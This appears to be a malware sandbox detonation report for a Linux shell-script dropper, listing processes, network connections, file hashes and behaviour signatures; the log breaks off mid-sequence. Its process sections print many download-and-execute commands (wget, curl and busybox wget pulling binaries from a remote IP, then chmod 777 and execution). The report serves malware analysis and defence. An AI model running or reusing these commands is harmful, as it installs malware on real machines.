[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 546071c6a6aeff34580b4d1a9b35a7c3 |
| SHA1 | dc2de298837a86d3bc86e8a328411229d9eccdb6 |
| SHA256 | 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12 |
| SHA512 | 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7 |
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 01:46
Reported
2024-10-29 01:48
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
22s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
Processes
/tmp/a5d00471e4903988f4d09563ee3cad4dba92df4fbd6cae9d1b2ffb9ac8538747.sh
[/tmp/a5d00471e4903988f4d09563ee3cad4dba92df4fbd6cae9d1b2ffb9ac8538747.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/wget
[wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
